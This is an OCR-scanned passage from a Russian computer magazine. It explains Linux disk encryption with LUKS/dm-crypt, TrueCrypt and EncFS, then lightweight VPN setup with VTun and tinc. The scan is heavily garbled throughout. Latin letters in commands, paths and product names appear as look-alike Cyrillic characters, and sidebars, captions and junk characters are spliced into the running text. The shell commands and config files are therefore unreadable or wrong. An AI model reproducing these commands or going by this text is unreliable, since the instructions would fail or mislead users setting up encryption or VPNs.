ѴѴаіегтагк-атаки, с помощью которой можно определить 
наличие втоме определенныхтипов файлов (бт-сгурі до 
сих пор использует режим шифрования СВС (СірЬег Віоск 
СНаіпіпд)), уязвимый для этой атаки, но его легко можно 
изменить на устойчивый Е55ІѴ, ЕРѴѴ или ХТЗ). Все системы 
могут использовать различныеалгоритмы шифрования, 
такие как, например, АЕ5-256, Зегрепі или ТѵѵобзЬ. Для 
получения доступа к данным все системы позволяют исполь- 
зовать зашифрованный ключ, хранящийся на ЮЗВ-брелке 
или смарт-карте. 

В стороне от Іоор-аез, БІІКЗ/бпп-сгурІ и ТгиеСгурІ: стоит 
простая и с виду незамысловатая программа ЕпсЕЗ. В 
отличие отсвоихтяжеловесных собратьев, она работает 
поверхуже существующей файловой системы и поэтому 
раскрывает злоумышлен нику кучу самой разнообразной 
информации, включая всю структуру каталогов файло- 
вой системы, время создания и модификации файлов, 
их владельца и размер. ЕпсЕЗ шифрует каждый файл 
индивидуально, поэтому скрытыми от посторонних ос- 
таются только сами данные, хранящиеся внутри файлов, 
и ихимена.Такая особенность делает ЕпсЕЗ неприме- 
нимой для хранения серьезных данных, но наделяет ее 
несколькими достоинствами: файловая система может 
динамически расти, инкрементальные системы бэкапа 
будут правильно обрабатывать файлы, зашифрованные 
ЕпсЕЗ, другие виртуальные файловые системы также 
могут быть зашифрованы (например, ты можешь подклю- 
чить си гібірбз, создать каталог, подключить к нему епсбз, 
и все заливаемые в него данные сохранятся на сервере в 
зашифрованном виде]. 

ШК 5 / 0 М-СКѴРТ 

Система криптозащиты дисков ИЖЗ/бт-сгурЕ как нетрудно 
догадаться, состоит из двухосновных компонентов: 

• бт-сгурі: — стандартная подсистема шифрования дисков 
Еіпих-ядра версии 2.6, которая опирается на подсисте- 
му Оеѵісе Маррег (бт), способную отображать дисковые 
устройства друг на друга, и криптографическое АРІ (СгурЕо 
АРІ), также предоставляемое ядром и предназначенное для 
выполнения различных криптографических функций. 

• БІІКЗ (Бтих ІІпібеб Кеу Зеіир) — стандарт шифрова- 



ния дисковых устройств для Еі п их, который описывает 
дисковый формат для зашифрованных данных. Благода- 
ря Иб КЗ производители дистрибутивов и разработчики 
ПО, работающего с дисковыми устройствами, получают 
возможность встроить в свои продукты средства для од- 
нозначного определения шифрованных дисков и работы 
с ними. Например, подсистема НАБ, которая сегодня 
используется большинством дистрибутивов в качестве 
прослойки для работы с оборудованием, уже давно умеет 
определять БІІ КЗ-диски, поэтому, если в комп будет 
вставлена флешка, зашифрованная с помощью ИЖ5/ 
бт-сгурі, пользовательувидит сообщение с просьбой 
ввести пароль, после чего флешка будет благопо- 
лучно смонтирована. Именно в этой стандартизации 
заключается главное достоинство БІІКЗ/бт-сгурІ: перед 
всеми остальными решениями. 

Для создания БІІКЗ-совместимых шифрованных дисков 
предназначена утилита под названием сгурізеіир-іикз, 
которая в отдельных дистрибутивах (например, ІІЬипІи) 
ловко замаскирована под обычную сгурізеіир. Поэтому для 
ее установки достаточно выполнить простую команду: 

$ зисіо арС-деС іпзСаІІ сгурСзеСир 

Больше ничего инсталлировать не нужно, бт-сгурі и все не- 
обходимые криптомодули уже есть в дистрибутиве. Но перед 
тем как начать шифрование, их придется загрузить: 

$ зисіо тосіргоЬе Ьт-сгурЦ 

$ зисіо тосіргоЬе зЬа256 

$ зисіо тосіргоЬе аез 

Чтобы модули загружались во время инициализации ОС, 
добавим их имена в файл /еіс/тобиіез: 

$ зисіо -і 

# есЬо "<бт-сгурЦ\пзЬа25б\паез " » /еРс/тосіиІез 

Далее выбираем дисковый раздел, который хотим подвер- 
гнуть шифрованию, и забиваем его нулями (если в разделе 
есть данные, их необходимо сохранить вукромном месте): 

$ зисіо сісі іН=/сіеѵ/ 2 его оН=/с1еѵ/зсіа5 Ьз = 4К 

Для пущей надежности и запутывания взломщика раздел 
можно наполнить случайными данными, ноэта процедура 
можетзанять длительное время (несколько часов, а для 
больших дисков — и целые сутки): 

$ зисіо сісі і:Е=/сіеѵ/гапсіот оП=/сіеѵ/зсіа5 Ьз = 4К 




> іпіо 

ЕпсЕЗ может 
работать в Бі п их, 
Мае 05 X, ЕгееВЗБ 
и, теоретически, 
в любом БІ N IX, 
поддерживающем 
фреймворк 
Бізе. Проект по 
портированию 
ЕпсЕЗ в ѴѴіпбоѵѵз 
располагается по 
адресу ѵѵѵѵѵѵ.аз- 
зетЫа.сопп/зрасез/ 
ѵѵепсіз . 




> ѵѵагпіпд 

• В целях 
безопасности 
индексацию 
зашифрованных 
разделов лучше 
отключить, 
отредактировав 
конфигурационный 
файл /еіе/ирбаіебб, 
сопЕ 

• Файлы, 
зашифрованные 
ЕпсЕЗ, не могут 
иметь жестких 
ссылок, так как 
система шифрования 
привязывает данные 
не к іпобе, а к имени 
файла 
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Устанавливаем ТгиеСгѵрІ: 



ШКЗ/сІт-сгурІ: и образы ФС 

ШКВ/сІт-сгурІ вполне пригоден и для создания образов ФС, которые 
можно использовать для хранения важной информации: 

# сісі іТ=/сіеѵ/игапсіот оТ=1икз . ітд Ьз=1М соипС=100 

# ІозеСир /сІеѵ/ІоорО Іикз . ішд 

# сгурДзеСир ІикзРогтаД /сіеѵ/ІоорО -с аез-сЬс- 
еззіѵ: зка25б -з 256 

# сгурДзеДир ІикзОреп /сіеѵ/ІоорО Іикз 
#ткДз.ехД2 /сіеѵ/таррег/іикз 

# тксііг /тпД/Іикз 

# тоипД /сіеѵ/таррег/іикз /Іикз 



Инициализируем ШК5-раздел с помощью сгурізеіир: 

$ зисіо сгурДзеДир ІикзРогшаД /<іеѵ/зсіа5 \ 

-с аез-хДз-рІаіп -з 256 

Опция '-с' задает режим шифрования, в нашем случае это АЕ5-ХТ5 (имеет 
гораздо более высокийуровеньзащиты по сравнению с режимами 
СВС, ЕСВустойчив кѴѴаІегтагк-атакам]. Опция ’-з' задает длину ключа 
шифрования в битах. Утилита сгурізеіир запросит пароль, используе- 
мый для расшифровки ключа шифрования, а если говорить простым 
языком — для доступа к данным раздела. Попробуй придумать что-нибудь 
действительно сложное. 

Послетого, как раздел будет инициализирован, его можно отобразить 
на другое блочное устройство с помощью Оеѵісе Маррегитаким образом 
получить доступ к данным (все записываемые на эти устройства данные 
будут передаваться бт-сгурі и попадать на физический раздел уже в 
зашифрованном виде]: 

$ зисіо сгурДзеДир ІикзОреп /с1еѵ/зсіа5 имя 




РИЛ щЩтчт 4С-*іГ 



Зыби раем алгоритм шифрования и хеширования 
ТгиеСгѵрІ: 



Чтобы операционная система сама научилась подключать и монтировать 
нужные криптованныеустройства во время загрузки, а затем корректно 
отключать их во время шатдауна, достаточно добавить по одной строке в 
файлы Мс/сгурЛаЬ и /еІсЛзІаЬ: 

$ зисіо -і 

# есДю "имя /<іеѵ/зсіа5 попе Іикз , сір!іег=аез-сЬс- 
еззіѵ: зка256 " » /еДс/сгурДДаЬ 

# есДю " /сіеѵ/таррег/имя /тпД/имя ехД4 сІеДаиІДз 0 0" \ 

» /еДс/ДзДаЬ 

Теперь во время каждой загрузки ОС будет спрашивать парольдля 
доступа к криптованному разделу, если он будетуказан неправильно — 
загрузка остановится. 

Шифрование домашнего каталога производится поточнотакой 
же схеме с тем лишь исключением, что перед добавлением новой 
записи в /еІс/ТзІаЬ следует удалить старую запись, ссылающую- 
ся на/Ьоте. При создании шифрованной флешки специальные 
записи в /еІс/сгурІТаЬ и /еІс/ЫаЬ не требуются. Подсистема НАЕ 
сама определит наличие на устройстве хранения ШК5-раздела 
и передаст эту информацию среде рабочего стола (Споте, КОЕ, 
ХЕСЕ], которая, в свою очередь, выведет на экран окно с просьбой 
ввести пароль. Единственное, что необходимо сделать — при 
первом монтировании флешки изменить права доступа на ее 
корневой каталог: 

$ зисіо сДюѵт -К юзер: юзер /шесііа/имя 
$ зисіо скшосі д+з /шесііа/имя 

Здесь юзер — это твое имя в системе, а имя — название метки, которую ты 
указал при создании файловой системы (опция утилиты ткіз]. 
Интересная особенность ШКЗ/сІпп-сгурІ: заключается в возможности ис- 
пользования сразу нескольких ключей шифрования (а значит, и паролей] 
для одного дискового устройства. Это может понадобиться в многополь- 
зовательских системах для выделения каждому пользователю собствен- 
ного пароля, расшифровывающего диск. Новые ключи добавляются в 
ШК5 с помощью действия Іи кзАсІсЖеу утилиты сгурізеіир: 



Теперь на разделе можно создать файловую систему и смонтировать ее: 

$ зисіо ткДз.ехД4 /сіеѵ/таррег/имя -Ь метка 
$ зисіо тксііг /тпД/имя 

$ зисіо тоипД /сіеѵ/таррег/имя /тпД/имя 

Размонтирование и отключение устройства от Оеѵісе Маррегпроисходит 
в обратном порядке: 

$ штюипД /тпД/имя 
$ сгурДзеДир ІикзСІозе зсіа5 



$ зисіо сгурДзеДир ІикзАсісіКеу /сіеѵ/зсіа5 

Команда попроситтебя ввести текущий пароль, а затем дважды ввести 
новый. Удалить ключ можно, используя следующую команду: 

$ зисіо сгурДзеДир ІикзБеІКеу /сіеѵ/зсіа5 ІБ-ключа 

Идентификатор нужного ключа ты найдешь в выводе следующей 
команды: 

$ зисіо сгурДзеДир ІикзБишр /сіеѵ/зсіа5 



► 100 
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Форматирование образа ТгиеСгурІ 



ІЛЖЗ/сІт-сгурІ и одноразовые ключи 

ШК5/сІпп-сгурІтакжеумеетиспользовать одноразовые ключи, что 
очень полезно при шифровании зѵѵар-разделов: 

# змаробі: -а 

# сгурЬзеЬир -й /йеѵ/игапйош сгеаЬе сгурЬозѵ/ар /йеѵ/зйаі 

# ткзѵгар /йеѵ/шаррег/сгурЬозѵ/ар -Ь ассеззізйепіесі -ѵі 

# еско "сгурЬозѵгар /йеѵ/зйаі /йеѵ/игапйош зѵ/ар" » /еЬс/сгурЬЬаЬ 

# есЪо " /йеѵ/таррег/сгурРозілгар попе змар зм О 0" » /еЬс/ТзЬаЬ 

# змароп -а 



Вместо пароляты можешь использовать ключевой файл, сохраненный 
на ІЭЭВ-брелке или любом другом носителе информации. Для этого 
создай случайный ключ с помощью сИ: 

$ скі іН = /иеѵ/игапс!от оН=/путь/к/файлу Ьз = 512 соипС = 4 

Азатем используй его при инициализации ШК5-раздела: 




Главное окно ТгиеСгурІ и один смонтированный образ 



уже существующихтомов, причем делаетэто так, что формально нельзя 
доказать их наличие. В-третьих, ТгиеСгурІ: создаеттома такими, что их 
невозможно отличить от случайных данных, что полезно при сокры- 
тии информации (ШК5, как было описано выше, добавляет к любому 
тому заголовок, по которому его легко найти]. В-четвертых, ТгиеСгурІ: 
позволяет менять пароли или файлы ключей для тома без потери данных 
(Ш КЗ требует пересоздания тома). 

В связи слицензионными проблемами (при всей открытости исход- 
ного кода лицензия ТгиеСгурІ была признана несвободной ведущими 
производителями дистрибутивов] ТгиеСгурІ был исключен из многих 
дистрибутивов, поэтому его придется скачивать и устанавливать само- 
стоятельно: 



$ зисіо сгурСзеСир ІикзРогшаС -с аез-хкз-ріаіп -з 256 \ 
/с1еѵ/зс1а5 /путь /до /ключа 

Для «открытия» раздела используй следующую команду: 

$ зисіо сгурСзеСир -сі /путь /до /ключа ІикзОреп \ 

/с1еѵ/зс1а5 имя 

ТКІІЕСКѴРТ 

Открытая система шифрования дисков ТгиеСгурІ появилась для систем 
ѴѴіпсІоѵѵз еще в 2004 году, и уже через год в нее была добавлена поддерж- 
ка Ыпих (версия 4.0], которая стала полноценной в 2008 году, когда была 
выпущена ТгиеСгурІ; 5.0 с графическим интерфейсом какдля ѴѴіпсІоѵѵз, 
таки для Ыпих. 

ТгиеСгурів первуюочередьпредназначенадля шифрования образов 
ФС, но можетбыть использована и для шифрования целых разделов. 
Также, каки ШК5, Ыпих-версия ТгиеСгурІ опирается на подсистему 
бт-сгурі, но, в отличие от первой, использует іизе для монтирования 
зашифрованныхустройств/образов. Это оставляетсвой отпечаток на 
производительности и делаетТгиеСгурі более медленной в сравнении с 
ШК5, однако и у нее есть свои сильные стороны. 

Во-первых, ТгиеСгурІ: по-настоящему кроссплатформенна, версии ПО 
есть для ѴѴіпсІоѵѵз, МасОЭХи Ыпих, их ядро абсолютно одинаково, поэто- 
му никаких проблем при переносе образов между системами возникнуть 
не может (для чтения ШК5-разделов под ѴѴіпсІоѵѵз есть программа 
РгееОТРЕ, но за ее поддержку отвечают сторонние разработчики]. Во- 
вторых, ТгиеСгурІ: умеет создавать скрытые шифрованныетома внутри 



$ ссі /Стр 

$ ѵѵдеС ТШСр: //ѵтѵі. СгиесгурС . огд/йоѵѵпІоасІ/ЦгиесгурЦ- 
6 . За-1іпих-х86 . Саг . дг 

$ Саг -хгГ СгиесгурЦ-6 . За-1іпих-х86 . Саг . дг 
$ . /СгиесгурЦ-б . За-зекир-х86 

В процессе установки необходимо прочитать и согласиться слицензией 
и ввести свой пароль в системе (или пароль рута]. После этого ТгиеСгурІ: 
будет установлен в каталог/изг, захламляя систему неуправляемыми 
пакетным менеджером файлами (которые, правда, могут быть удалены с 
помощью команды ігиесгурі-ипіпзіаіі.зЫ. 

После установки запускаем команду ігиесгурі и видим перед 
собой графический интерфейс. Основное пространство окна 
занимает список смонтированных шифрованных образов/разде- 
лов, в верхней части располагается стандартное меню, а снизу — 
основные элементы управления программой : создать том (Сгеаіе 
Ѵоіите], смонтировать, размонтировать, открыть существующий 
том и т.д. После нажатия на кнопку «С ге а іе Ѵоіите» ты попа- 
дешь в мастер создания томов. Он проведет тебя через все шаги 
создания зашифрованного тома, включая выбор носителя (файл 
или раздел], типа тома (обычный или скрытый], ввод полного пути 
до файла тома или выбор устройства, выбор алгоритма шифро- 
вания и хеширования ключей, ввод размера тома, ввод пароля 
для доступа, выбор файловой системы (РАТ, Ехі2 или ЕхЕЗ) и т.д. 
Все просто и понятно. После того, кактом будет создан, его можно 
найти с помощью кнопки «Эеіесі Еііе» в нижней части окна про- 
граммы, ввести пароль доступа, и том появится в списке подклю- 
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Ѵоішпе Іуре: 

1) Могшаі 

2) Иі^еп 

Беівсі: (Ц : 1 

Епіег ѵоіл» ра^Ь: ДврДс.івд 

Епіег ѵоіите аіх« {»і»К/аіге|Н]/зігеб) і ЮОИ 

Епегурііоп аІдагІ^Ьів: 

1) АЕ5 

2 ) $егрспІ 

3) ТиоГібЬ 

4) АЕ5-Т*оТі*Н 
АЕ&-ТноЁІ5Іі-&егреіѴЁ 

Б} Йегрепі: - ДЕ5 

7) 5егрепіТмо^ізЬ-АЁ5 

8) Т«о^івЬ'5вгрвпІ 
Зеіесі: [1]: 1 

НазЬ аІдогііЬів: 

I) НІРЁНР-160 

2} 5НА-512 

3) №ііг\роо\ 
іеіесі [1] : | 

Текстовый режим работы ТгиеСгѵрІ 



ченных томов. Клик на томе автоматически откроет стандартный 
файловый менеджер. После окончания работы можно нажать 
«Оізтоипі АН» и выйти из программы. 

Не каждый пользователь будет рад графическому интерфейсу, поэтому 
у ТгиеСгурІ есть еще один тип интерфейса: интерактивный текстовый 
режим, активируемый с помощью флага '-I'. Созданиетома в этом 
режиме очень похоже на созданиетома с использованием графического 
мастера. Ты просто запускаешь команду «Ітиесгурі: -I -с» и отвечаешь на 
все те же стандартные вопросы. По окончании будет создан образ (или 
ТшеСгурНныйтом внутри раздела], который можно подключитьс помо- 
щью следующей команды: 

$ бгиесгурб -С /путь/до/образа /точка/монтирования 

для раз монтирован ия используется флаг' -б': 

$ бгиесгурб -б 

Замечу, что ТгиеСгурІ совсем неуступает ШК5 по степени обеспечения 
безопасности зашифрованных данных. В последней версии программы 
используется всетотже режим шифрования ХТ5, который мы исполь- 
зовали при создании зашифрованных разделов с помощью ШК5. В 
качестве алгоритмов шифрования могутбыть использованы алгоритмы 
АЕ5, ТѵѵобзЬ и Зегрепі, ни один из нихеще не был скомпрометирован. 
Более того, ТгиеСгурі позволяет использовать так называемые каскады 
алгоритмов, когда зашифрованный одним алгоритмом блокданных 
повторно шифруется другим. 

ЕЫСР5 

Виртуальная файловая система ЕпсРЗ распространяется в виде обычно- 
го дистрибутивного пакета и нетребуетдля своей работы ничего, кроме 
поддержки фреймворка ІТізе в ядре, ПЬбизе, ОрепЗЗБ и небольшой биб- 
лиотеки для логирования. Для инсталляции ЕпсРЗ достаточно установить 
пакете одноименным названием: 

$ зибо арб-деб іпзбаіі епсбз 



Создать зашифрованную с помощью ЕпсРЗ файловую систему очень 
просто, для этого подойдетлюбой каталог. В качестве примера создадим 
два пустых подкаталога вДтр: директория сгуріеб будет содержать 
данные после их шифрования с помощью ЕпсРЗ, а бесгурбеб — исполь- 
зоваться просто какточка монтирования для нее же: 

$ сб /бтр 

$ ткбіг сгурбеб бесгурбеб 

Подключим к каталогам ЕпсРЗ: 

$ епсбз /бшр/сгурбеб /бшр/бесгурбеб 

Теперь необходимо ответить на несколько вопросов. Первый вопрос: 
выбор режима работы ЕпсРЗ с пользователем. Их всего два: ехрегі 
(буква «х») и рагапоіб (буква «р»]. Выбрав первый вариант, ты сможешь 
задать алгоритм шифрования (АЕ5 или ВІоѵѵбзЫ, длину ключа, такие 
вещи, ка к Іпібіаіігабіоп Ѵесбог (если ты незнаешь, что это такое, можешь 
жать <ЕпІег> для выбора ответа по умолчанию] ит.д. В режиме рагапоіб 
программа сама ответит на свои вопросы и предложит ввести пароль для 
доступа к данным. 

Стоит сказать, что, хотя для большинства пользователей режим 
рагапоіб будет более правильным выбором, режим ехрегб открывает 
некоторые возможности для оптимизации. Например, алгоритм 
ВІоѵѵбзЬ быстрее АЕ5, но он не используется по умолчанию, просто по- 
тому что нелегален для частного использования в некоторых странах. 
Также система по дефолту устанавливает блокданныхФС равным 1024 
байт, хотя лучшую производительность ЕпсЕЗ показывает при установ- 
ке размера блока равным размеру страницы оперативной памяти. То 
есть 4096 байт для х86. 

Но вернемся к нашему зашифрованному каталогу. Перейдем в каталог 
бесгурбеб и создадим несколько файлов: 

$ сб бесгурбеб 
$ есбю <дѵ\гегбу > бііеі 
$ есбю азббдЪ. > бі1е2 
$ есбю гхсѵЪп > біІеЗ 

Отключим ЕпсЕЗ и взглянем на результат: 

$ сб . . 

$ бизегтоипб -и /бтр/бесгурбеб 
$ сб сгурбеб 
$ 1 з 

Как видишь, ЕпсЕЗ полностью скрыла имена и данные файлов, но 
оставила почти все метаданные на виду. Кроме того, ЕпсЕЗ создала 
небольшой скрытый файл, начинающийся с «.епсіъ» и заканчиваю- 
щийся номером версии. 

Файл содержит в себе метаданные, такие как опции шифрования 
(алгоритм, длина ключа], заголовки МАО (Меззаде аібЬепбісабіоп 
собе) и размер блоков шифрования. 

ЧТО ЛУЧШЕ? 

Ситуация с шифрующими системами в Ыпих весьма неоднозначна. 

С одной стороны, здесь есть стандартная реализация под названием 
ШКЗ/бт-сгурС обладающая всеми присущими криптосистеме 
функциями/свойствами и поддерживаемая из коробки самыми 
популярными дистрибутивами. С другой стороны, у ШКЗ/бпп-сгурІ: 
есть серьезные конкуренты, которые уделывают ее по нескольким 
характеристикам. Так что однозначный выбор сделать трудно. Я 
бы рекомендовал использовать ШКЗ/бт-сгурІ: или Іоор-аез для 
повседневного использования и прибегать к помощи ТгиеСгурІ, 
когда необходимо создать кроссплатформенный том, и ЕпсЕЗ, когда 
другие системы не могут быть использованы (например, шифрован- 
ный бэкап). □с 
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маленький ѴРИ 



Выбираем простое и легковесное ѴРМ-решение 

Если в соседней локалке во всю шпилятся в одну из популярных сетевых игр, 
а ты не можешь поучаствовать в баталиях из-за того, что гама рассчитана 
только на І_АІ\І, либо админы намудрили с ограничениями, выход один 
— поднять ѴРІ\І. Учитывая, что туннель не будет постоянным, главным 
требованием выдвинем простоту в настройках и нетребовательность 
к ресурсам. Посмотрим, что предлагает нам ОрепЗоигсе. 



ѴТІІЫ 

Очень популярная программа, позволяющая 
быстро создать виртуальный туннель через 
ТСР/ІРсети. Знакомство с сайтом проекта [ ѵіип. 
зЕпеі ] обнажает главный недостатокѴТип: он 
не развивается вотужетри года (последнее 
обновление датировано 6 декабря 2007 года]. 

Но нетребовательность ксистемным ресурсам, 
простота и гибкость настроек привели ктому, что 
его не списали со счетов, и сегодня ѴТип доступен 
в репозиториях большинства *піхсистем: Ыпих, 
*В50 и Зоіагіз. Пример для ОеЬіап/ІІЬипІи: 

$ зисіо арД-сасЪе зеагсЪ. ѵДип 
ѵДип - ѵігРиаІ Риппеі оѵег ТСР/ІР 
пебѵгогкз 

ѴТип поддерживает несколько типов виртуаль- 
ныхтуннелей — ІР, РРР, 5І_ІР, ЕОаегпеІ:, ТТУ и 
ріре. В качестве транспортного протокола может 
использоваться на выбор ТОР или ІЮР. Потоки 
кодируются 1 28-битным ключом по алгоритму 
ВІоѵѵЕізИ, для чего используются библиотеки 
ОрепЗЗб. Предусмотрена компрессия потока 
при помощи библиотекгііб и Іго. Уровень сжатия 



также поддается регулировке, поэтому можно 
выбрать оптимальный вариант между нагрузкой 
на СРІІ и загрузкой канала. ѴТип использует 
клиент-серверную архитектуру. На одном из 
хостов программа запускается каксервер 
(слушает 5000 порт), а на остальных — как клиент. 
Количество клиентов ограничивается только 
мощностью сервера. При этом настройки ѴТип 
позволяют при необходимости ограничить ско- 
рость туннелей, чтобы равномерно распределить 
загрузку канала. 

Если клиент находится за ЫАТ, ѴТип позволяет 
ему без проблем подключаться ксерверу.для 
этого следуетлишь использовать в качестве 
транспорта ТСР. Собственно, эта особенность и 
привлекает пользователей. 

Система работает через универсальные 
драйверы Іип и Іар, позволяющие программам 
в окружении пользователя (изегзрасе] самостоя- 
тельно обрабатывать пакеты. Нужные устройства, 
как правило, уже созданы в системе: 

$ 1з -аі /(іеѵ/пеД/Дип 

сгп-гп-гп- 1 гооР гооР 10, 200 2010- 

07-10 12:39 /сІеѵ/пеД/Дип 



Если ядро пересобиралось самостоятельно, 
тогда не забудь включить опции СОЫРІС_ТІІМ и 
С0ЫР1С_ЕТНЕРТАР. 

Устанавливаем пакетѵіип в ОеЬіап/ІЛэипІю: 

$ зисіо арО-деО іпзОаІІ ѵДип 

Все настройки демона производятся в файле 
МсМипсІ.сопЕ Можно запустить несколько 
демонов, каждый из которых будет считывать 
свой конфиг и работать в качестве сервера или 
клиента. В поставке уже идет готовый шаблон 
файла, требующий предварительной правки. Все 
возможные параметры можно найти в докумен- 
тации ѴТип. 

Настройки внутри разбиты на несколько разде- 
лов. Секции орбопз и б е^аіііі являются общими 
для всех, позже их можно переопределить для 
каждого клиента: 

$ зисіо папо/еіс/ѵіипсі.соггі 

орДіопз { 
рогР 5000; 
зузіод сіаешоп; 

# описываем пути к используемым про- 
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■ 

> Ііпкз 

• Сайт проекта ѴТип 
— ѵіип.збпеі: 

• Сайт проекта Ііпс — 
Ііпс-ѵрп.огд: 

• Страница проекта 
п2п — п1:ор.огд/п2п 

• Страничка зосаі — 
ѵѵѵѵѵѵ.сІезі-ипгеасЬ. 
огд/зосаД 

• Проект СІРЕ — 
зііез.іпка.сІе/ЫдгесІ/ 
сІеѵеІ/сіре.ЫтІ 



граммам 

ібсопбід /зЪіп/ібсопбід; 
гоибе /зЬіп/гоибе; 
ір /зЬіп/ір; 

бігемаіі /зЪіп/ірбаЫез; 

} 

бебаиіб { 

сошргезз 120:9; # уровень сжатия 
зрееб 0 ; # ограничение полосы 
} 

# теперь описываем клиентов 
сііепбі { 

раззчлб р@ззѴѴ0гБ; 

# тип может быть: бип, ебкег, б бу, ріре 
буре бип; 

ргобо ибр; 
епсгурб уез; 

# зрееб 256:128; 
кеераііѵе уез; 

# команда, выполняемая при подключении 
ир { 

ібсопбід "%% 10.1.0.1 роіпбороіпб 10.1.0.2 
тби 1450 

# при необходимости пробрасываем соединение 

# бігечлаіі " -б паб -А РОЗТКОЕТШС -з 10.1.0.2 
-3 МАЗСХШКАБЕ " ; 

} ; 

# команда при отключении (необязательная) 
боѵт { 

бігетлаіі "-б паб -Е"; 
ібсопбід "%% боѵтп"; 



ІІМТЕРЫЕТ 



ійе-ѵЧліі 
кііам ыи 

жЬ»1Іпві » ГвІ-Ь Ег -Гвілі *ш 



1 Г+вІмІ 1ГГТ1І -ЕІ. 



і *1 Гіг ЬМІ ГІііашв 
:ІДавІ 



} ; 



} 



■ Я ІІЕ-ШМ КІІ^І -фі 

I ГЛ Г ві адіві 

■ ІРМР ріщія. 

гірЧі.-ьі )Ші1а Ін№ 
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Ч--иач^--йп ■ «гіпік ш щін і 1 Гі м іш і ііі м іі іиі I ІЛпІ 
*^рМ ЙРкр^НЧ Р'ІЧ41РІ 
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ИКГНГ-* - ІП> Ів+І Гм ца-* ^І.| ■»' нпі> I 

№ ЫМГ ШЕ1ІГМІІН ІМІІ 
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Ищем нужные пакеты в репозитории ЦЬипІи 



В ОеЬіап/СІЬипІи для удобства управления предлагается файл 
/е{с/(Маи11:Мип. При настройке сервера достаточно изменить 

Внутри ОДНу Строку: 

$зис1о папо/еІс/сІе^аииМип 

# для сервера 
КШ_ЗЕКѴЕК=уез 

Теперь можно запускать сервер: 

$ зибо іпѵоке-гс . б ѵбип збагб 

Или на первых порах, чтобы получить больше информации, 
лучше ввести: 

$ зибо ѵбипб -з 

Клиент настраивается аналогично, параметры, по сути, зер- 
кальны серверным: 

$5ис1о папо/еІсМипсІ.соггі 

орбіопз { 
рогб 5000; 
бішеоиб 60; 

ібсопбід /зЬіп/ібсопбід; 
гоибе /зЬіп/гоибе; 
бігеѵ^аіі /зЬіп/ірбаЫез; 

} 

сііепбі { 
раззѵ^б р@ззѴѴ0гБ; 
буре бип; 
ир { 

ібсопбід "%% 10.1.0.2 роіпбороіпб 10.1.0.1 
тби 1450 " ; 

гоибе "абб -пеб 1.2.3.4/16 дгм 10 . 1 . 0 . 1" ; 

} ; 

} 

И еслиты используешь ОеЬіап-Ьазеб дистрибутив, поправь/ 
еІс/беІаиІіМип, чтобы іпіі-файл знал, кого запускать. 



Аналогично секции ир можно создать секцию б оѵѵп, где опи- 
сать настройки, которые должны быть выполнены в процессе 
разрыва ѴРІ\І. Команды могутбытьлюбые, поэтому, кроме 
настроек интерфейса, сюда можно прописать пару строк, поз- 
воляющихсоздаватьавтоматический бэкап важныхданных. 
Например, так: 

ргодгаш /Ьіп/зк "-с 'баг об - /ебс/*' "; 



$5ік1о папо/еІс/сІе^аииМип 

СЫ ЕЫТ 0_ЫАМЕ = с 1 і епб 1 
# ІР или имя ѴТип сервера 
СЫЕЫТ0_НОЗТ=ѵбип . шуботаіп . ги 

Для начала за пустим ѵіипб суказанием имени клиентско- 
го хоста, фигурирующего в конфиге, и ІР-адреса (имени) 
сервера: 
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Установки вііпс.сопі 1 

$ зибо ѵбипб -р сііепбі ѵбип.туботаіп. ги 

Следим за процессом подключения, в другой консоли смотрим логи: 

$ зисіо баіі -1 /ѵаг/іод/шеззаде 

Команда іісопбд покажет наличие 1:ип0 интерфейса. На этом настройку 
ѴШп можно считать законченной. В дальнейшем клиента можно запускать 
обычным образом через іпТ-скрипт: 

$ зисіо іпѵоке-гс.сі ѵкип зкагк 

тшс 

Следующий претендент на звание самого маленького и самого простого 
в настройках ѴРІ\І -бпс ( бпс-ѵрп.огд ]. Стартовал проект достаточно давно 
(в 1998 году], активные разработки ведутся до сих пор. В отличие от ѴТип, 
бпс позволяетсоединить между собой компьютеры через I Рѵ4/І Рѵб сети , 
работающие под управлением самых разных ОС: біпих, *В50, Мае 05 X, 
Зоіагіз, ѴѴіпбоѵѵ5 2к-5е7еп. Крометого, экспериментально поддержива- 
ется работа и на таких девайсах, какіРбопе, іРо<± Для шифрования потока 
задействуется 0реп55І_, возможно сжатие с помощью 2 ІіЬ или І 20 . Также 
бпс предоставляет возможность соединить вместе несколько Ебэегпеі 
сегментов, что позволяет, например, играть в игры, доступные только в 
локальной сети. Чтобы добавить новый мост, достаточно создать еще один 
конфигурационный файл. 

Также, каки ѴТип.бпстребует наличия драйверов Тб Ы/ТАР Пакетсбпс 
доступен в репозиториях большинства дистрибутивов. Установочный пакет 
для ѴѴіпбоѵѵз можно скачать на офсайте. В ОеЬіап/ІЛэипІи вводим: 

$ зисіо арб-деб іпзбаіі біпс 

После установки стартует демон, но делать ему сейчас нечего. Чтобы все 
заработало, необходимо создать конфигурационные файлы, сгенерировать 
пару ключей и распространить их на компьютеры, участвующие в под- 
ключении. Конфигв наличии пока только один. В файлеМс/бпс/пебЬооІ: 
прописываются названия сетей, которые должны быть за пущены бпс. Он 
пуст (комментарии не в счет], добавим сюда нашу будущую сеть: 

$ зисіо папо/еІсДіпс/пеІ.ЬооІ 

ѵрппеб 

В/изг/збаге/сІос/бпс/ехатрІезты найдешь примеры конфигов. По мере 
необходимости копируем их в/е1;с/бпс и правим. Чтобы иметь возможность 
подключаться сразу к нескольким ѴРЫ-сетям, следует расположить их 
настройки в «своих» подкаталогах. Например, в нашем случае этоМс/бпс/ 
ѵрппеб именно здесь демон будет искать настройки сети ѵрппеб В пределах 
одной ѴРЫ сети ее название необязательно должно быть уникальным на 
всехсистемах-участниках, но лучше использовать одно имя, чтобы потом 
не путаться. Если ѴРЫ-сеть одна, такое распределение по каталогам 
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Генерируем ключевую пару для работы Ппс 

необязательно (все конфиги тогда размещаем в корне/еіе/бпе]. Режим ѴРЫ 
и удаленный узел, к которому будем подключаться, описываются в файле 
бпс.сопЕ 

$ зисіо папо/еІсАіпс/ѵрппеіАіпс.соггі 

# символическое имя подключения 
Бате = ту_ѵрп 

# компьютер, к которому подключаемся 

# возможно задание нескольких СоппесбТо 
СоппесбТо = урпОІ 

# устройство 
Беѵісе = /беѵ/пеб/бип 

# режим ѴРЫ : гоибег I зѵлі_ б сЪ. I ЬиЬ 
Мосіе = зтлібсЬ. 

РгіѵабеКеуРіІе = /ебс/біпс/ѵрппеб/гза_кеу .ргіѵ 

# если несколько сетевых карт 
ВіпбТоІпбегбасе = ебйі 

# пакеты, которые не могут пройти напрямую, будут отброшены 

# БігесбОпІу = уез 

# перенаправление пакетов 

